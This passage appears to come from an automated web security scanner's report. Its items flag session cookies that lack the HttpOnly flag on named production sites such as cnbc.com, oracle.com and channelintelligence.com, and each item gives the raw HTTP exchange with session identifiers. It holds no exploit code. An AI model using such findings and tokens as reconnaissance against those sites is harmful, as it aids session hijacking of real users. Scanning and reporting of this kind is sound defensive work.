HTTP/1.1 200 OK Server: Oracle-Application-Server-10g Content-Language: en-US Content-Type: text/html; charset=UTF-8 Content-Length: 246459 Date: Tue, 06 Sep 2011 16:13:42 GMT Connection: keep-alive Vary: Accept-EncodingSet-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>OTN Discussion Forums : Forum Home</title> <meta http-equiv="content-type" content="...[SNIP]...
13.12. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://netsuite.tt.omtrdc.net
Path:
/m2/netsuite/mbox/standard
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:mboxSession=1315341135013-154927; Domain=netsuite.tt.omtrdc.net; Expires=Tue, 06-Sep-2011 16:08:46 GMT; Path=/m2/netsuite The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927&mboxPC=1315341135013-154927.19&mboxPage=1315341466598-609944&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=HP_Trial_111510&mboxId=0&mboxTime=1315323466980&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fhome.shtml&mboxReferrer=&mboxVersion=40 HTTP/1.1 Host: netsuite.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.netsuite.com/portal/home.shtml User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mboxPC=1315341135013-154927.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]
Response
HTTP/1.1 302 Moved Temporarily Server: Test & Target P3P: CP="NOI DSP CURa OUR STP COM" Date: Tue, 06 Sep 2011 15:37:46 GMT Location: http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927&mboxPC=1315341135013-154927.19&mboxPage=1315341466598-609944&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=HP_Trial_111510&mboxId=0&mboxTime=1315323466980&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fhome.shtml&mboxReferrer=&mboxVersion=40&mboxXDomainCheck=trueSet-Cookie: mboxSession=1315341135013-154927; Domain=netsuite.tt.omtrdc.net; Expires=Tue, 06-Sep-2011 16:08:46 GMT; Path=/m2/netsuite Content-Length: 0
13.13. http://pg.links.origin.channelintelligence.com/pages/wl.asp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://pg.links.origin.channelintelligence.com
Path:
/pages/wl.asp
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:sessionstamp=27545040; expires=Tue, 06-Sep-2011 17:46:40 GMT; domain=.channelintelligence.com; path=/ ASPSESSIONIDQQBBATAR=PLAFJPGCOAIHIKCFGNLLPKIC; path=/ serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/ The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/wl.asp?nCTID=0&nSCID=0&nIID=163810295&nICnt=1&nDCnt=8&nRGID=1964&sPCode=&nStoreID=0&nVStoreID=0&sModelNumber=047400098978&sCCode=US&nRadius=15&nColID=0&nOppCnt=0&sRL=13017277_841291_8679155_13016956_48968727_11302_86109971_26080384&nRID=0&sRnd=B96Gkfc1 HTTP/1.1 Host: pg.links.origin.channelintelligence.com Proxy-Connection: keep-alive Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098978 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDQSTCSACR=OMFNJPGCMPJDECJINBCLIADH; serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; ASPSESSIONIDQSSATADQ=MHDNEIADOCGBNAAMMCKHGJDD
Response
HTTP/1.1 302 Object moved Date: Tue, 06 Sep 2011 16:46:41 GMT Server: Microsoft-IIS/6.0 P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" X-Powered-By: ASP.NET pragma: no-cache Location: http://ttwbs.channelintelligence.com/?eid=203&oid=19483251&linkid=&uid=163810295&rgid=1964&scid=0&ctid=0&crdr=http%3A%2F%2Fcontent%2Elinks%2Echannelintelligence%2Ecom%2Fimages%2Fblank%2Egif%3Fy%3D0&origargs=nCTID%3D0%26nSCID%3D0%26nIID%3D163810295%26nICnt%3D1%26nDCnt%3D8%26nRGID%3D1964%26sPCode%3D%26nStoreID%3D0%26nVStoreID%3D0%26sModelNumber%3D047400098978%26sCCode%3DUS%26nRadius%3D15%26nColID%3D0%26nOppCnt%3D0%26sRL%3D13017277%5F841291%5F8679155%5F13016956%5F48968727%5F11302%5F86109971%5F26080384%26nRID%3D0%26sRnd%3DB96Gkfc1 Content-Length: 685 Content-Type: image/gif Expires: Tue, 06 Sep 2011 16:45:41 GMTSet-Cookie: sessionstamp=27545040; expires=Tue, 06-Sep-2011 17:46:40 GMT; domain=.channelintelligence.com; path=/ Set-Cookie: serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/Set-Cookie: ASPSESSIONIDQQBBATAR=PLAFJPGCOAIHIKCFGNLLPKIC; path=/ Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://ttwbs.channelintelligence.com/?eid=203&oid=19483251&linkid=&uid=163810295&r...[SNIP]...
13.14. http://pg.links.origin.channelintelligence.com/pages/wl.asp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://pg.links.origin.channelintelligence.com
Path:
/pages/wl.asp
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:sessionstamp=27545045; expires=Tue, 06-Sep-2011 17:46:42 GMT; domain=.channelintelligence.com; path=/ ASPSESSIONIDSSAACRAR=JFOLFFNCAOIGHHNCKCKCPJKC; path=/ serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/ The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/wl.asp?nCTID=0&nSCID=0&nIID=30314234&nICnt=1&nDCnt=10&nRGID=1964&sPCode=&nStoreID=0&nVStoreID=0&sModelNumber=047400098961&sCCode=US&nRadius=15&nColID=0&nOppCnt=0&sRL=48968727_26080384_8679155_11302_2271669_13016956_841291_64856419_24552604_13017277_48968727&nRID=0&sRnd=B96Gkgc1 HTTP/1.1 Host: pg.links.origin.channelintelligence.com Proxy-Connection: keep-alive Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098961 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDQSTCSACR=OMFNJPGCMPJDECJINBCLIADH; serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; ASPSESSIONIDQSSATADQ=MHDNEIADOCGBNAAMMCKHGJDD
Response
HTTP/1.1 302 Object moved Date: Tue, 06 Sep 2011 16:46:42 GMT Server: Microsoft-IIS/6.0 P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" X-Powered-By: ASP.NET pragma: no-cache Location: http://ttwbs.channelintelligence.com/?eid=203&oid=19483251&linkid=&uid=30314234&rgid=1964&scid=0&ctid=0&crdr=http%3A%2F%2Fcontent%2Elinks%2Echannelintelligence%2Ecom%2Fimages%2Fblank%2Egif%3Fy%3D0&origargs=nCTID%3D0%26nSCID%3D0%26nIID%3D30314234%26nICnt%3D1%26nDCnt%3D10%26nRGID%3D1964%26sPCode%3D%26nStoreID%3D0%26nVStoreID%3D0%26sModelNumber%3D047400098961%26sCCode%3DUS%26nRadius%3D15%26nColID%3D0%26nOppCnt%3D0%26sRL%3D48968727%5F26080384%5F8679155%5F11302%5F2271669%5F13016956%5F841291%5F64856419%5F24552604%5F13017277%5F48968727%26nRID%3D0%26sRnd%3DB96Gkgc1 Content-Length: 716 Content-Type: image/gif Expires: Tue, 06 Sep 2011 16:45:42 GMTSet-Cookie: sessionstamp=27545045; expires=Tue, 06-Sep-2011 17:46:42 GMT; domain=.channelintelligence.com; path=/ Set-Cookie: serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/Set-Cookie: ASPSESSIONIDSSAACRAR=JFOLFFNCAOIGHHNCKCKCPJKC; path=/ Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://ttwbs.channelintelligence.com/?eid=203&oid=19483251&linkid=&uid=30314234&rg...[SNIP]...
13.15. http://pg.links.origin.channelintelligence.com/pages/wl.asp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://pg.links.origin.channelintelligence.com
Path:
/pages/wl.asp
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:sessionstamp=21967169; expires=Tue, 06-Sep-2011 17:45:36 GMT; domain=.channelintelligence.com; path=/ ASPSESSIONIDQSSATADQ=MHDNEIADOCGBNAAMMCKHGJDD; path=/ serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/ The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/wl.asp?nCTID=0&nSCID=0&nIID=30314234&nICnt=1&nDCnt=10&nRGID=1964&sPCode=&nStoreID=0&nVStoreID=0&sModelNumber=047400098961&sCCode=US&nRadius=15&nColID=0&nOppCnt=0&sRL=841291_24552604_11302_48968727_13017277_2271669_64856419_13016956_48968727_26080384_8679155&nRID=0&sRnd=B96Gjac1 HTTP/1.1 Host: pg.links.origin.channelintelligence.com Proxy-Connection: keep-alive Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=00047400302457 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Object moved Date: Tue, 06 Sep 2011 16:45:36 GMT Server: Microsoft-IIS/6.0 P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" X-Powered-By: ASP.NET pragma: no-cache Location: http://ttwbs.channelintelligence.com/?eid=203&oid=19483251&linkid=&uid=30314234&rgid=1964&scid=0&ctid=0&crdr=http%3A%2F%2Fcontent%2Elinks%2Echannelintelligence%2Ecom%2Fimages%2Fblank%2Egif%3Fy%3D0&origargs=nCTID%3D0%26nSCID%3D0%26nIID%3D30314234%26nICnt%3D1%26nDCnt%3D10%26nRGID%3D1964%26sPCode%3D%26nStoreID%3D0%26nVStoreID%3D0%26sModelNumber%3D047400098961%26sCCode%3DUS%26nRadius%3D15%26nColID%3D0%26nOppCnt%3D0%26sRL%3D841291%5F24552604%5F11302%5F48968727%5F13017277%5F2271669%5F64856419%5F13016956%5F48968727%5F26080384%5F8679155%26nRID%3D0%26sRnd%3DB96Gjac1 Content-Length: 716 Content-Type: image/gif Expires: Tue, 06 Sep 2011 16:44:36 GMTSet-Cookie: sessionstamp=21967169; expires=Tue, 06-Sep-2011 17:45:36 GMT; domain=.channelintelligence.com; path=/ Set-Cookie: serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/Set-Cookie: ASPSESSIONIDQSSATADQ=MHDNEIADOCGBNAAMMCKHGJDD; path=/ Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://ttwbs.channelintelligence.com/?eid=203&oid=19483251&linkid=&uid=30314234&rg...[SNIP]...
13.16. http://pixel.adsafeprotected.com/jspix
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://pixel.adsafeprotected.com
Path:
/jspix
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=7C0A9FBD613B362C337EB77B71CF9834; Path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jspix?anId=144&pubId=4749&campId=176996 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1Set-Cookie: JSESSIONID=7C0A9FBD613B362C337EB77B71CF9834; Path=/ Content-Type: text/javascript Date: Tue, 06 Sep 2011 15:05:41 GMT Connection: close var adsafeVisParams = { mode : "jspix", jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250", adsafeSrc : "",...[SNIP]...
13.17. http://pixel.everesttech.net/1688/i
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://pixel.everesttech.net
Path:
/1688/i
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:everest_session_v2=ts5OZjd7UQcAAI3@; path=/; domain=.everesttech.net everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Wed, 11-Sep-2030 01:48:44 GMT The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1688/i?ev_sid=58&ev_ci=700032768&ev_ai=700644175&ev_cri=705923885&ev_pl HTTP/1.1 Host: pixel.everesttech.net Proxy-Connection: keep-alive Referer: http://www.cnbc.com/ Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: gglck=zqROZUBXyFQAAIdR; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:08:44 GMT Server: ApacheSet-Cookie: everest_session_v2=ts5OZjd7UQcAAI3@; path=/; domain=.everesttech.net Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Wed, 11-Sep-2030 01:48:44 GMT P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM" Cache-Control: no-cache Vary: X-EF-Forwarded-For,Cookie,Host Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT ETag: "2051142-80-49f19eb07d340" Accept-Ranges: bytes Content-Length: 128 Content-Type: image/png .PNG . ...IHDR.....................bKGD............. pHYs...........~.....tIME......).......IDATx.c````........E@....IEND.B`.
13.18. https://register.cnbc.com/forgotPassword.do
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://register.cnbc.com
Path:
/forgotPassword.do
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:JSESSIONID=3903DB621D7BD6523413306545DD8633; Path=/ pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /forgotPassword.do HTTP/1.1 Host: register.cnbc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:49 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19Set-Cookie: JSESSIONID=3903DB621D7BD6523413306545DD8633; Path=/ Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Cache-Control: pre-check=0, post-check=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html;charset=UTF-8Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/ Content-Length: 85618 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <title>Reset Password</title> <link href="/css/member_center_sytles.css" rel="stylesheet" typ...[SNIP]...
13.19. https://register.cnbc.com/memberCenter.do
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://register.cnbc.com
Path:
/memberCenter.do
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:JSESSIONID=EB56D589D26668AFFB39D13706936E94; Path=/ pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:29 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /memberCenter.do HTTP/1.1 Host: register.cnbc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D
Response
HTTP/1.1 302 Moved Temporarily Date: Tue, 06 Sep 2011 15:01:29 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19Set-Cookie: JSESSIONID=EB56D589D26668AFFB39D13706936E94; Path=/ Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register Content-Length: 0 Connection: close Content-Type: text/plainSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:29 GMT; path=/
13.20. https://register.cnbc.com/registerUser.do
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://register.cnbc.com
Path:
/registerUser.do
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:JSESSIONID=0B252CD2AC1891E8F5AE500FFDA5AC28; Path=/ pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /registerUser.do?iframe=yes&source=register HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=EB56D589D26668AFFB39D13706936E94
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:05:43 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19Set-Cookie: JSESSIONID=0B252CD2AC1891E8F5AE500FFDA5AC28; Path=/ Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Cache-Control: pre-check=0, post-check=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html;charset=UTF-8Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/ Content-Length: 53350 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Ty...[SNIP]...
13.21. http://search.oracle.com/search/search
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://search.oracle.com
Path:
/search/search
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:JSESSIONID=8d920c7f1e6c29f780b369434c7e86c0802cf02ce47e; path=/search BIGipServerses_ext_prod_pool=2131530381.30494.0000; expires=Wed, 07-Sep-2011 03:54:24 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/search?start=1&search_p_main_operator=all&group=Oracle+OpenWorld&q=xss+faq+help+contact+phone HTTP/1.1 Host: search.oracle.com Proxy-Connection: keep-alive Referer: http://www.oracle.com/openworld/register/packages/index.html?src=7013425&Act=226 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_cc=true; s_nr=1315342463159; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fregister%2Fpackages%2Findex.html%3Fsrc%3D7013425%26Act%3D226; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=0 Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.2 (TN;ecid=118531604039,0) Content-Length: 38704 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 15:54:24 GMT Connection: closeSet-Cookie: JSESSIONID=8d920c7f1e6c29f780b369434c7e86c0802cf02ce47e; path=/search Set-Cookie: ses.qapp.sg_tab_name=Oracle+OpenWorld; HttpOnlySet-Cookie: BIGipServerses_ext_prod_pool=2131530381.30494.0000; expires=Wed, 07-Sep-2011 03:54:24 GMT; path=/ ...[SNIP]...
13.22. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://snas.nbcuni.com
Path:
/snas/api/getRemoteDomainCookies
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=96CD1AEC186AFFCEEE1A9069E6B37A5F; Path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1 Host: snas.nbcuni.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: s_nr=1313446468300; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:00:28 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5Set-Cookie: JSESSIONID=96CD1AEC186AFFCEEE1A9069E6B37A5F; Path=/ Cache-Control: max-age=10 Expires: Tue, 06 Sep 2011 15:00:38 GMT Content-Length: 167 Content-Type: text/html __nbcsnasadops.doSCallback({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"96CD1AEC186AFFCEEE1A9069E6B37A5F","s_vi":"[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]"}});
13.23. http://ttwbs.channelintelligence.com/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://ttwbs.channelintelligence.com
Path:
/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:sessionstamp=5F0620DE-F4C8-E4AD-F1CC-A22673796C99;Domain=.channelintelligence.com;Expires=Tue, 06-Sep-11 17:45:37 GMT The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /?eid=203&oid=19483251&linkid=&uid=163810295&rgid=1964&scid=0&ctid=0&crdr=http%3A%2F%2Fcontent%2Elinks%2Echannelintelligence%2Ecom%2Fimages%2Fblank%2Egif%3Fy%3D0&origargs=nCTID%3D0%26nSCID%3D0%26nIID%3D163810295%26nICnt%3D1%26nDCnt%3D8%26nRGID%3D1964%26sPCode%3D%26nStoreID%3D0%26nVStoreID%3D0%26sModelNumber%3D047400098978%26sCCode%3DUS%26nRadius%3D15%26nColID%3D0%26nOppCnt%3D0%26sRL%3D13017277%5F841291%5F8679155%5F13016956%5F48968727%5F11302%5F86109971%5F26080384%26nRID%3D0%26sRnd%3DB96GjZc1 HTTP/1.1 Host: ttwbs.channelintelligence.com Proxy-Connection: keep-alive Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098978 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: serverstamp=951ED21A%2D5742%2D4191%2DBC56%2D8856DB199D2C
Response
HTTP/1.1 302 Found Date: Tue, 06 Sep 2011 16:45:37 GMT Server: Jetty(6.1.22) Expires: Thu, 01 Jan 1970 00:00:00 GMTSet-Cookie: sessionstamp=5F0620DE-F4C8-E4AD-F1CC-A22673796C99;Domain=.channelintelligence.com;Expires=Tue, 06-Sep-11 17:45:37 GMT Cache-Control: private Content-Length: 0 Location: http://content.links.channelintelligence.com/images/blank.gif?y=0 Via: 1.1 iad061102000000 (MII-APC/2.1) Content-Type: text/plain
13.24. http://www.atg.com/svc-common/script/propertyFunc.js.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.atg.com
Path:
/svc-common/script/propertyFunc.js.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22; Path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
